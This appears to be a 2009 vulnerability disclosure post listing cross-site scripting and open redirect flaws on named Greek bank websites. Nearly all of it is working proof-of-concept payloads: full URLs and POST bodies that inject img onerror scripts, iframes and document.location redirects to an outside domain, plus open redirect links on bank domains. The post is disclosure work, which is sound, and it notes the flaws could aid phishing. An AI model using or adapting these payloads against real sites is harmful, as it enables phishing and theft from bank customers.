Major Greek bank sites with SSL vulnerable to XSS and open redirectsWritten by DPSunday, 10 May 2009Security researcher "Hexspirit" has discovered multiple XSS and open redirect vulnerabilities affecting all major Greek bank websites.
Fraudsters can exploit these cross-site scripting flaws to conduct convincing phishing attacks against e-banking customers and site visitors. Most pages are served over SSL. Security cannot be guaranteed just by the presence of "https" at the start of a URL, or checking that the browser address bar contains the correct domain name.
All the reported vulnerabilities are working at this time of writing and we hope to be fixed as soon as possible.
Greek Banks XSS Mirrors:
winbank.gr XSS Mirror (SSL)
URL: https://www.winbank.gr/utils/iban1/iban_GR.asp
POST: PBAccount=&HiddenPirAccount=&HiddenPrintMode=0&OtherAccount=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS% 2F%29+%2F%3E&submit2=%C5%F0%E9%E2%E5%E2%E1%DF%F9%F3%E7
milleniumbank.gr XSS Mirror (no SSL)
URL: http://www.millenniumbank.gr/MillenniumVB/Templates_NB_Tools/NB_PopUp_IBANCalculator.aspx?LANGID=30&
MENU=CALC
POST: txtAccountNo=&_ctl0%3AtxtIBANCheck=%3Cimg+src%3Dk+onerror%3Dalert%28%2FXSS%2F%29+%2F% 3E&_ctl0%3AbtnCheckIBAN=%CE%88%CE%BB%CE%B5%CE%B3%CF%87%CE%BF%CF%82
probank.gr XSS Mirror (SSL)
URL: https://www.probank.gr/search/index.php?qu=%22%3Cmarquee%3E%3Cimg+src%3Dk.png+onerror%3Dalert(%2FXSS
%2F)+%2F%3E%3Ch1%3EXSSed%3C%2Fh1%3E
proton.gr XSS Mirror (SSL)
protonbank.gr XSS Mirror (SSL)
URL: https://www.proton.gr/search/index.php?sid=61f882a8fc8dd3e8e175a416b0fb0afa&qu=%22%3E%3Cimg%20src=k%
20onerror=alert(/XSS/)%20/%3E%3Ciframe%20src=%22http://www.xssed.com%22%3E
URL: https://www.protonbank.gr/search/index.php?sid=5aa6fd152554b75ef8d5da27c103eff9&qu=%22%3E%3Cimg+src%
3Dk+onerror%3Dalert(%2FXSS%2F)+%2F%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.xssed.com%22%3E
eurobank.gr XSS Mirror (SSL)
URL: https://www.eurobank.gr/europortal/content/europortal/gr/content/privateservices/ibancalc.asp
POST: branch=3243&cd=43&main=%22%3Cimg+src%3D%22%22+onerror%3D%22write%28%27%3Cbody%3E%3Cb%3EHexspirit+was +here.+XSS+flaw.%3C%2Fb%3E%27%29%3Bclose%28%29%3Balert%28body.innerHTML%29%22+%2F%3E&account=&ibansp ace=&source=
nbg.gr Open redirect Mirror (SSL)
URL: https://e-loans.nbg.gr/webaccess/nbg/hanbg/loading.asp?pn=http://www.xssed.com
alpha.gr XSS Mirror (SSL)
URL: https://www.alpha.gr/tools/account.asp?Error=1&Browser=nc&AccountNumber="><img+src=""
onError="document.location='http://xssed.com'">
bankofcyprus.gr Open redirect Mirror (no SSL)
URL: http://www.bankofcyprus.gr/adredir2.asp?url=http://www.xssed.com
ttbank.gr XSS Mirror
URL: http://www.ttbank.gr/default.asp?langID=1&pageID=122&siteID=1&SearchWord=%22%3E%3Cmarquee%3E%3Cimg+s
rc=%22%22+onerror=%22write(%27%3Cb%3EHOHO%20XSSed%3C/b%3E%27);close();%22+/%3E&x=10&y=7
dias.com.gr XSS Mirror (no SSL)
URL: http://www.dias.com.gr/dias/content/main.asp?menu=2&search=%22%3E%3Ciframe%20src=%22http://www.xssed
.com%22%3E
|